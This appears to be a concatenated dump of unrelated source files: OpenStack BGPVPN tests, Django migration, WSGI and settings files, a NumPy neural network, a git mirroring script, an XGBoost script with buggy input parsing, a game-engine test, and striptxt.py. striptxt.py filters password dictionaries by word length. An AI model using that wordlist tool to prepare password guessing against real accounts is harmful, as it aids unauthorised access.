agent_id='fooagent',
device="de:ad:00:00:be:ef")
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port),
helpers.HOST)
ml2_rpc_callbacks.update_device_down(self.ctxt,
host=helpers.HOST,
agent_id='fooagent',
device="de:ad:00:00:be:ef")
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port),
helpers.HOST)
self.mock_detach_rpc.reset_mock()
self.plugin.delete_port(self.ctxt, port['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port),
helpers.HOST)
def test_exception_on_callback(self):
with mock.patch.object(bagpipe.LOG, 'exception') as log_exc:
self.bagpipe_driver.registry_port_updated(
None, None, None,
context=self.ctxt,
port=None
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
self.assertTrue(log_exc.called)
def test_format_bgpvpn_network_route_targets(self):
driver = self.bgpvpn_plugin.driver
bgpvpns = [{
'type': 'l3',
'route_targets': ['12345:1', '12345:2', '12345:3'],
'import_targets': ['12345:2', '12345:3'],
'export_targets': ['12345:3', '12345:4']
},
{
'type': 'l3',
'route_targets': ['12345:3', '12346:1']
},
{
'type': 'l2',
'route_targets': ['12347:1']
}]
result = driver._format_bgpvpn_network_route_targets(bgpvpns)
expected = {
'l3vpn': {
'import_rt': ['12345:1', '12345:2', '12345:3', '12346:1'],
'export_rt': ['12345:1', '12345:2', '12345:3', '12345:4',
'12346:1']
},
'l2vpn': {
'import_rt': ['12347:1'],
'export_rt': ['12347:1']
}
}
self.assertItemsEqual(result['l3vpn']['import_rt'],
expected['l3vpn']['import_rt'])
self.assertItemsEqual(result['l3vpn']['export_rt'],
expected['l3vpn']['export_rt'])
self.assertItemsEqual(result['l2vpn']['import_rt'],
expected['l2vpn']['import_rt'])
self.assertItemsEqual(result['l2vpn']['export_rt'],
expected['l2vpn']['export_rt'])
class TestBagpipeServiceDriverV2RPCs(TestBagpipeCommon,
TestBagpipeOVOPushPullMixin):
'''Check RPC push/pull and local registry callback effects'''
def setUp(self):
cfg.CONF.set_override('mechanism_drivers',
['logger', 'fake_agent'],
'ml2')
super(TestBagpipeServiceDriverV2RPCs, self).setUp(
"%s.%s" % (__name__, TestCorePluginML2WithAgents.__name__),
driver=('networking_bgpvpn.neutron.services.service_drivers.'
'bagpipe.bagpipe_v2.BaGPipeBGPVPNDriver'))
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_itf_event_router_assoc(self, mocked_push):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']):
mocked_push.reset_mock()
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNRouterAssociation)], 'updated')
mocked_push.reset_mock()
itf = self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
itf['port_id'])
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNRouterAssociation)], 'updated')
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_itf_event_network_assoc(self, mocked_push):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']):
mocked_push.reset_mock()
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNNetAssociation)], 'updated')
mocked_push.reset_mock()
itf = self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
itf['port_id'])
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNNetAssociation)], 'updated')
ovos_in_call = mocked_push.mock_calls[0][1][1]
for ovo in ovos_in_call:
if not isinstance(ovo, objs.BGPVPNNetAssociation):
continue
for subnet in ovo.all_subnets(net['network']['id']):
self.assertIsNone(subnet['gateway_mac'])
| apache-2.0 | -7,102,266,521,299,206,000 | 42.697945 | 79 | 0.497157 | false |
Ixxy-Open-Source/django-linkcheck-old | linkcheck/migrations/0001_initial.py | 1 | 1560 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('field', models.CharField(max_length=128)),
('text', models.CharField(default='', max_length=256)),
('ignore', models.BooleanField(default=False)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Url',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.CharField(unique=True, max_length=255)),
('last_checked', models.DateTimeField(null=True, blank=True)),
('status', models.NullBooleanField()),
('message', models.CharField(max_length=1024, null=True, blank=True)),
('still_exists', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='link',
name='url',
field=models.ForeignKey(related_name='links', to='linkcheck.Url'),
),
]
| bsd-3-clause | -7,173,154,571,665,117,000 | 37.04878 | 114 | 0.549359 | false |
FrederikDiehl/NNForSKLearn | NeuralNetwork.py | 1 | 14455 | __author__ = 'Frederik Diehl'
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import MinMaxScaler
class NeuralNetwork(BaseEstimator, RegressorMixin, object):
_maxSteps = None
_maxNonChangingSteps = None
_learningRate = None
_shrinkage = None
_architecture = None
_momentum = None
_useDropout = None
_alphaStandout = None
_betaStandout = None
_warmStart = None
_batchSize = None
_weights = None
_inputDimension = None
_outputDimension = None
_step = None
_lastDelta = None
_percentageDropout = None
_inputNormalizer = None
_outputNormalizer = None
def __init__(self, maxSteps=50, maxNonChangingSteps=5, learningRate=1e-6, shrinkage=0.9, architecture=[10],
momentum=0.7, useDropout=False, alphaStandout=0, betaStandout=0.5, warmStart=False,
startingWeights=None, batchSize = 1, step = 0, lastDelta = None, percentageDropout=1):
self._maxSteps = maxSteps
self._maxNonChangingSteps = maxNonChangingSteps
self._learningRate = learningRate
self._shrinkage = shrinkage
self._architecture = architecture
self._momentum = momentum
self._useDropout = useDropout
self._alphaStandout = alphaStandout
self._betaStandout = betaStandout
self._warmStart = warmStart
self._weights = startingWeights
self._batchSize = batchSize
self._step = step
self._lastDelta = None
self._percentageDropout = percentageDropout
def get_params(self, deep=True):
params = {}
params["maxSteps"] = self._maxSteps
params["maxNonChangingSteps"] = self._maxNonChangingSteps
params["learningRate"] = self._learningRate
params["shrinkage"] = self._shrinkage
params["architecture"] = self._architecture
params["momentum"] = self._momentum
params["useDropout"] = self._useDropout
params["alphaStandout"] = self._alphaStandout
params["betaStandout"] = self._betaStandout
params["warmStart"] = self._warmStart
params["batchSize"] = self._batchSize
params["step"] = self._step
params["lastDelta"] = self._lastDelta
params["percentageDropout"] = self._percentageDropout
return params
def _initializeWeights(self, randomState=0):
randomState = check_random_state(randomState)
self._weights = []
for k in range(len(self.neuronsPerLayer())-1):
self._weights.append(np.ones(shape=(self.neuronsPerLayer()[k]+1, self.neuronsPerLayer()[k+1])))
for k in range(len(self.neuronsPerLayer())-1):
for i in range(len(self._weights[k])):
for j in range(len(self._weights[k][i])):
#Starting weights are set randomly, dependant on the number of inputs. Compare lecture 17, neuralnetworks slide 10.
self._weights[k][i][j] = randomState.uniform(0, 1)/(self.neuronsPerLayer()[k+1])**0.5
#self._weights[k][i][j] = randomState.uniform(0, 1)
def _batchify(self, X, batchSize, y=None):
#first, set the batches.
#A list of feature matrixes, with the ith column representing the ith example of said feature.
index = 0
batchFeatures = []
#A list of matrices in the one of k coding scheme.
if not y is None:
batchTargets = []
while index < len(X):
if batchSize != 0:
numberExamples = min(batchSize, len(X) - index)
else:
numberExamples = len(X)
batchFeatures.append(np.ones(shape=(self._inputDimension+1, numberExamples)))
if (not y == None):
batchTargets.append(np.zeros(shape=(self._outputDimension, numberExamples)))
for i in range(numberExamples):
for j in range(self._inputDimension):
batchFeatures[-1][j, i] = X[index, j] #TODO in case of multiple dimensions, break glass.
#Now, set the one out of k training scheme
if (not y == None):
for j in range(self._outputDimension):
batchTargets[-1][j, i] = y[index, j]
#batchTargets[-1][0, i] = y[index]
index += 1
if not y == None:
return batchFeatures, batchTargets
else:
return batchFeatures
def neuronsPerLayer(self):
neuronsPerLayer = []
neuronsPerLayer.append(self._inputDimension)
neuronsPerLayer.extend(self._architecture)
neuronsPerLayer.append(self._outputDimension)
return neuronsPerLayer
def set_params(self, **parameters):
for parameter, value in parameters.items():
if (parameter == 'maxSteps'):
self._maxSteps = value
elif (parameter == 'maxNonChangingSteps'):
self._maxNonChangingSteps = value
elif (parameter == 'learningRate'):
self._learningRate = value
elif (parameter == 'shrinkage'):
self._shrinkage = value
elif (parameter == 'architecture'):
self._architecture = value
elif (parameter == 'momentum'):
self._momentum = value
elif (parameter == 'useDropout'):
self._useDropout = value
elif (parameter == 'alphaStandout'):
self._alphaStandout = value
elif (parameter == 'betaStandout'):
self._betaStandout = value
elif (parameter == 'warmStart'):
self._warmStart = value
elif (parameter == 'batchSize'):
self._batchSize = value
elif (parameter == 'step'):
self._step = value
elif (parameter == 'lastDelta'):
self._lastDelta = value
elif parameter == 'percentageDropout':
self._percentageDropout = value
return self
def calcLayerOutputsBatch(self, batchFeatures, doDropout, randomState = 0):
randomState = check_random_state(randomState)
dropoutVectors = []
numExamples = batchFeatures.shape[1]
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k]+1, numExamples)))
else:
#else.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k], numExamples)))
outputsPerLayer = []
outputsPerLayer.append(batchFeatures)
for k in range(0, len(self._weights)): #All the same except for the output layer.
if (k == len(self._weights)-1): # Do not append the bias.
#outputsPerLayer.append(np.maximum(np.matrix(np.dot(self._weights[k].transpose(), outputsPerLayer[k])), 0))
#outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
else: #Do append the bias neuron.
outputsPerLayer.append(np.ones((self.neuronsPerLayer()[k+1]+1, numExamples)))
inputThisLayer = np.dot(self._weights[k].transpose(), outputsPerLayer[k])
#outputsPerLayer[k+1][:self.neuronsPerLayer()[k+1]] = np.maximum(inputThisLayer[:self.neuronsPerLayer()[k+1]], 0)
#print(inputThisLayer)
outputsPerLayer[k+1][:-1] = self.sigmoid(inputThisLayer)
if (self._useDropout):
dropoutNeuronNumber = int(self.neuronsPerLayer()[k+1]*self._percentageDropout)
dropoutVectors[k+1][:dropoutNeuronNumber] = np.clip(self.sigmoidStandout(self._alphaStandout * inputThisLayer + self._betaStandout), 0, 1)[:dropoutNeuronNumber]
#print(dropoutVectors[k+1])
if (doDropout):
dropoutVectors[k+1] = np.ones((dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])) * dropoutVectors[k+1] > np.random.rand(dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])
#print(dropoutVectors[k+1])
outputsPerLayer[k+1] = np.multiply(outputsPerLayer[k+1], dropoutVectors[k+1])
#print(outputsPerLayer[-1])
if (doDropout):
return outputsPerLayer, dropoutVectors
else:
return outputsPerLayer, dropoutVectors
def _learnFromBatch(self, batchFeatures, batchTargets):
outputsPerLayer, dropoutVectors = self.calcLayerOutputsBatch(batchFeatures, True)
errorsPerLayer = []
for i in range(len(outputsPerLayer)-1):
errorsPerLayer.append(np.zeros((outputsPerLayer[i].shape[0], len(batchTargets))))
#Set the error for the output layer.
errorsPerLayer.append(batchTargets - outputsPerLayer[-1])
#now, it gets funny.: Calculate all of the errors. In both cases. dropout applies to the errorsPerLayer, too. A neuron that isn't 'active' will have no error.
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1])
else:
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1][0:-1])
if (self._useDropout):
errorsPerLayer[k] = np.multiply(errorsPerLayer[k], dropoutVectors[k])
#Calculate the deltaW.
deltaW = []
for k in range(len(self._weights)):
deltaW.append(np.zeros(shape=self._weights[k].shape))
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative).transpose()
tmp = np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]).transpose()
else:
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative)[0:-1].transpose()
tmp = (np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]))[0:-1].transpose()
#And again, a neuron which doesn't exist won't cause deltaWs.
if (self._useDropout):
deltaW[k] = np.dot(np.multiply(outputsPerLayer[k], dropoutVectors[k]), tmp)
else:
deltaW[k] = np.dot(outputsPerLayer[k], tmp)
#print(deltaW)
#raw_input()
return deltaW
def fit(self, X, y):
X = np.matrix(X)
y = np.matrix(y)
self._outputNormalizer = MinMaxScaler()
self._inputNormalizer = MinMaxScaler()
self._outputNormalizer = self._outputNormalizer.fit(y)
self._inputNormalizer = self._inputNormalizer.fit(X)
self._inputDimension = X.shape[1]
self._outputDimension = y.shape[1]#For now, hardcoded to 1-dimensional regression problems.
if (not self._warmStart or self._weights == None):
self._initializeWeights()
self._lastDelta = None
batchFeatures, batchTargets = self._batchify(np.matrix(self._inputNormalizer.transform(X)), self._batchSize,
np.matrix(self._outputNormalizer.transform(y)))
#do for each step until the maximum steps:
for i in range(self._maxSteps):
reducedLearningRate = self._learningRate * self._shrinkage ** self._step
for j in range(len(batchFeatures)):
deltaW = self._learnFromBatch(batchFeatures[j], batchTargets[j])
if (self._lastDelta == None):
self._lastDelta = deltaW
for k in range(len(self._weights)):
self._lastDelta[k] = ((1-self._momentum) * deltaW[k] + self._momentum * self._lastDelta[k])
self._weights[k] = self._weights[k] + reducedLearningRate * self._lastDelta[k]
#self._positifyWeights()
self._step += 1
#print(step)
return self
def predict(self, X, debug=False):
X = np.matrix(X)
batchFeatures = self._batchify(self._inputNormalizer.transform(X), self._batchSize)
batchResults = np.zeros((X.shape[0], self._outputDimension))
dropoutResults = []
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k]+1, 1)))
else:
#else.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k], 1)))
begin = 0
end = batchFeatures[0].shape[1]
for i in range(len(batchFeatures)):
outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(batchFeatures[i], False)
outputsLast = outputsLast[-1]
batchResults[begin:end, :] = outputsLast.transpose()
begin = end
end = end + batchFeatures[i].shape[1]
#for featureList in batchFeatures:
# outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(featureList, False)
# outputsLast = outputsLast[-1]
# batchResults.extend(list(np.array(outputsLast).reshape(-1,)))
# for i in range(len(dropoutFeatures)):
# summed = np.matrix(np.sum(dropoutFeatures[i], 1)).transpose()
# dropoutResults[i] += summed
batchResults = np.matrix(batchResults)
if (debug):
return self._outputNormalizer.inverse_transform(batchResults), dropoutResults
else:
return self._outputNormalizer.inverse_transform(batchResults)
def sigmoid(self, X):
#return 1 / (1 + np.exp(-X))
return 0.5 * (X/(1+abs(X))+1)
def sigmoidStandout(self, X):
#return 1 / (1 + np.exp(-X))
sigmoidResult = 0.5 * (X/(1+abs(X))+1)
#return 4*(sigmoidResult * (1-sigmoidResult))
return sigmoidResult | mit | 6,231,215,392,406,471,000 | 44.602524 | 214 | 0.590384 | false |
NulledGravity/striptxt | striptxt.py | 1 | 5271 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os, time, sys
from sys import argv, stdout
# Global variables
INPUT = None
OUTPUT = None
LENGTH = None
VERBOSE = False
AUTOOUT = False
AUTOLEN = False
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[92m' # green
B = '\033[34m' # blue
O = '\033[91m' # orange
GR = '\033[94m' # gray
P = '\033[35m' # purple
C = '\033[36m' # cyan
BO = '\033[1m' #bold
def Credits():
os.system('clear')
print(O + ' _____ _ _ _______ _ \n' +
' / ____| | (_) |__ __| | | \n' +
' | (___ | |_ _ __ _ _ __ | |_ _| |_ \n' +
' \___ \| __| \'__| | \'_ \| \ \/ / __| \n' +
' ____) | |_| | | | |_) | |> <| |_ \n' +
' |_____/ \__|_| |_| .__/|_/_/\_\\__| \n' +
' | | \n' +
' |_| \n' + W)
print(W + BO + ' StripTxt v1' + W)
print(C + ' - automated text file word length limiter' + W)
print(C + ' - designed for Linux, for extracting passwords\n of desired length from dictionary files' + W + '\n')
print(B + ' https://github.com/NulledGravity/striptxt' + W + '\n\n')
def VerifyGlobals():
global INPUT, OUTPUT, LENGTH, VERBOSE, AUTOOUT, AUTOLEN
cwd = os.getcwd()
if not INPUT:
print(GR + ' [+] ' + R + 'You must define an input file!')
ExitLikeABitch(0)
if not os.path.isfile(INPUT):
print(GR + ' [+] ' + R + 'The input file was not found at the following path!')
print(GR + ' ' + cwd + os.sep + INPUT)
if not OUTPUT:
OUTPUT = 'out.txt'
AUTOOUT = True
if not LENGTH:
LENGTH = 8
AUTOLEN = True
if VERBOSE:
if AUTOOUT:
print(GR + ' [+] ' + W + 'You have not defined an output file!')
print(GR + ' [+] ' + 'The file will be created automatically at:')
print(GR + ' ' + cwd + os.sep + OUTPUT)
if AUTOLEN:
print(GR + ' [+] ' + W + 'You have not defined the desired string length')
print(GR + ' [+] ' + 'The default length will be ' + W + '8')
def ProcessTextFile():
try:
bunchsize = 1000000
bunch = []
with open(INPUT, 'r', encoding='latin-1') as r, open(OUTPUT, 'w', encoding='latin-1') as w:
print('\n' + GR + ' [+] ' + BO + 'starting processing' + W)
i = 0
for line in r:
if len(line) < (LENGTH + 1): continue
bunch.append(line)
PrintStatus(i)
if len(bunch) == bunchsize:
w.writelines(bunch)
bunch = []
i += 1
w.writelines(bunch)
print('\n')
except KeyboardInterrupt:
print('\n' + R + ' (^C) ' + O + 'interrupted\n' + W)
ExitLikeABitch(0)
def PrintStatus(index):
print(GR + ' [+] ' + W + BO + str(index) + W + ' lines processed', end='')
sys.stdout.write('\r')
sys.stdout.flush()
def HandleArguments():
global INPUT, OUTPUT, LENGTH, VERBOSE
args = argv[1:]
if args.count('?') + args.count('-h') + args.count('-help') + args.count('--help') > 0:
Help()
ExitLikeABitch(0)
try:
for i in range(0, len(args)):
if args[i] == '-l':
i += 1
LENGTH = int(args[i])
elif args[i] == '-i':
i += 1
INPUT = args[i]
elif args[i] == '-o':
i += 1
OUTPUT = args[i]
elif args[i] == '-v':
VERBOSE = True
except IndexError:
print('error')
print('\n' + R + '[!]' + W + 'indexerror\n\n')
def Help():
HelpIndent('Commands')
HelpIndent('-i' + W + ' <file>' + GR + ' set path to the dictionary', type=1)
HelpIndent('-o' + W + ' <file>' + GR + ' specify path for output, otherwise the file', type=1)
HelpIndent(GR + 'will be saved in the current directory', type=1, spaces=23)
HelpIndent('-l' + W + ' <lenght>' + GR + ' the lenght of strings to be saved, default value: 8', type=1)
HelpIndent('-v' + GR + ' show extra info on run', type=1)
print()
HelpIndent('Example')
HelpIndent(W + 'striptxt.py -i dictionary.txt', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -l 10', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -o newDictionary.txt -l 5', type=1)
print()
HelpIndent('-h, ?, --help, -help' + GR + ' show this help message', type=2)
print()
def HelpIndent(message="", type=0, spaces=4, insidePrint=True):
if type == 1 and spaces == 4: spaces = 8
out = ""
i = 0
for i in range(spaces):
out += ' '
i += 1
if type == 0: out += GR + message.upper()
if type == 1 or type == 2: out += O + message
out += W
if insidePrint:
print(out)
else:
return out
def ExitLikeABitch(code=0):
print(GR + ' [+] ' + W + 'quitting\n')
# GFY BITCH <3
exit(code)
def main():
Credits()
HandleArguments()
VerifyGlobals()
ProcessTextFile()
if __name__ == '__main__':
main() | mit | 3,570,116,909,102,634,000 | 32.157233 | 117 | 0.47012 | false |
erickmendonca/gdg-django-lab | gdg_pizza/wsgi.py | 1 | 1503 | """
WSGI config for gdg_pizza project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "gdg_pizza.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gdg_pizza.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
application = Cling(get_wsgi_application())
#application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | 7,895,412,395,360,587,000 | 40.75 | 79 | 0.790419 | false |
fredyw/git-migrator | gitmigrator.py | 1 | 3703 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Fredy Wijaya
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, subprocess, logging, argparse, shutil, stat, errno
logger = None
def execute(cmd):
logger.info('Command: %s' % ' '.join(cmd))
subprocess.check_call(cmd)
def execute_output(cmd):
branches = []
pattern = 'remotes/origin/'
out = subprocess.check_output(cmd)
for line in out.split(os.linesep):
stripped_line = line.strip()
if stripped_line.startswith(pattern):
if stripped_line.startswith(pattern + 'HEAD'): continue
branches.append(stripped_line[len(pattern):])
return branches
# this workaround is needed for Windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
if func in (os.rmdir, os.remove) and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU| stat.S_IRWXG| stat.S_IRWXO) # 0777
func(path)
else:
raise
def migrate(src_repo, dest_repo):
tmp_repo = '.tmprepo'
new_remote = 'newremote'
old_cwd = os.getcwd()
try:
if os.path.exists(tmp_repo):
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
execute(['git', 'clone', src_repo, tmp_repo])
os.chdir(tmp_repo)
branches = execute_output(['git', 'branch', '-a'])
execute(['git', 'remote', 'add', new_remote, dest_repo])
for branch in branches:
execute(['git', 'push', new_remote,
'+refs/remotes/origin/' + branch + ':' +
'refs/heads/' + branch])
execute(['git', 'push', new_remote, '--tags'])
finally:
os.chdir(old_cwd)
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
def configure_logger():
global logger
FORMAT = '%(asctime)s [%(levelname)-5s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('gitmigrator')
def help_formatter():
return lambda prog: argparse.HelpFormatter(prog, max_help_position=30)
def validate_args():
parser = argparse.ArgumentParser(formatter_class=help_formatter())
parser.add_argument('--source', type=str, required=True,
help='source repository URL')
parser.add_argument('--destination', type=str, required=True,
help='destination repository URL')
return parser.parse_args()
if __name__ == '__main__':
configure_logger()
args = validate_args()
try:
migrate(args.source, args.destination)
except Exception as e:
logger.error(str(e))
sys.exit(1)
| mit | -2,902,482,159,053,309,400 | 37.175258 | 88 | 0.662436 | false |
zlpmichelle/crackingtensorflow | template/xgboost/xgboost_stock_pre.py | 1 | 1349 | import sys
import xgboost as xgb
import pandas as pd
import numpy as np
print("----reading data\n")
train = pd.read_csv("train.csv")
train_feature = train.columns[0:-1]
train_label = train.columns[-1]
print("----training a XGBoost\n")
dtrain = xgb.DMatrix(train[train_feature].values, label=train[train_label].values)
param = {'max_depth': 5,
'eta': 1,
'eval_metric': 'auc'}
bst = xgb.train(param, dtrain, 30)
print("----predict stock\n")
fi = open("test.csv", 'r')
fulldata = []
linenum=0
features_num = 500
fea_str =[]
for line in fi:
if linenum%100==0: sys.stderr.write('%f\n' % linenum)
linenum += 1
try:
features = line.strip("\n").split(",")
data = []
inx = 1
for i in features.split(','):
if inx > int(features_num):
continue
inx += 1
data.append(float(i))
fulldata.append(data)
fea_str.append('%s' % '\t'.join(features))
except Exception as e:
sys.stderr.write('Exception: %s\n' % str(e))
sys.stderr.write('wrong line: %s\n' % line)
pass
xgb_input = np.array(fulldata)
label = np.array([-1])
test = xgb.DMatrix(xgb_input, label=label)
pred = bst.predict(test)
print("--- print result")
for fea_str, pred in zip(fea_str, pred):
print(fea_str + '\t' + str(pred) + '\n')
| apache-2.0 | 927,858,347,399,894,100 | 23.089286 | 82 | 0.581913 | false |
whiterabbitengine/fifeplusplus | tests/extension_tests/modelview_tests.py | 1 | 2883 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
from extension_test_utils import *
from loaders import *
import time
class TestModelView(unittest.TestCase):
def setUp(self):
self.engine = getEngine()
self.model = self.engine.getModel()
self.metamodel = self.model.getMetaModel()
loadMapFile("content/maps/new_official_map.xml", self.engine)
self.map = self.model.getMaps("id", "OfficialMap")[0]
self.elevation = self.map.getElevations("id", "OfficialMapElevation")[0]
self.layer = self.elevation.getLayers("id", "OfficialMapTileLayer")[0]
imgid = self.layer.getInstances()[0].getObject().get2dGfxVisual().getStaticImageIndexByAngle(0)
img = self.engine.getImagePool().getImage(imgid)
self.screen_cell_w = img.getWidth()
self.screen_cell_h = img.getHeight()
self.camloc = fife.Location(self.layer)
self.camloc.setLayerCoordinates(fife.ModelCoordinate(5,0))
def tearDown(self):
del self.engine
def testModelView(self):
cam = self.engine.getView().addCamera()
cam.setCellImageDimensions(self.screen_cell_w, self.screen_cell_h)
cam.setRotation(45)
cam.setTilt(40)
cam.setLocation(self.camloc)
rb = self.engine.getRenderBackend()
viewport = fife.Rect(0, 0, rb.getScreenWidth(), rb.getScreenHeight())
cam.setViewPort(viewport)
self.engine.getView().resetRenderers()
self.engine.initializePumping()
for count in range(10):
self.engine.pump()
#time.sleep(0.03)
c = self.camloc.getExactLayerCoordinates()
c.x += 0.50
c = self.camloc.setExactLayerCoordinates(c)
cam.setLocation(self.camloc)
self.engine.finalizePumping()
# removed from test set now due to switch to new directory structure -> content moved to clients
# to be considered if this should be taken into use again
TEST_CLASSES = []
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | -7,791,245,036,448,926,000 | 33.592593 | 97 | 0.673257 | false |
sergei-maertens/bfeu.net | src/bfeu/conf/settings.py | 1 | 8042 | import os
import django.conf.global_settings as DEFAULT_SETTINGS
# Automatically figure out the ROOT_DIR and PROJECT_DIR.
DJANGO_PROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
ROOT_DIR = os.path.abspath(os.path.join(DJANGO_PROJECT_DIR, os.path.pardir, os.path.pardir))
#
# Standard Django settings.
#
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
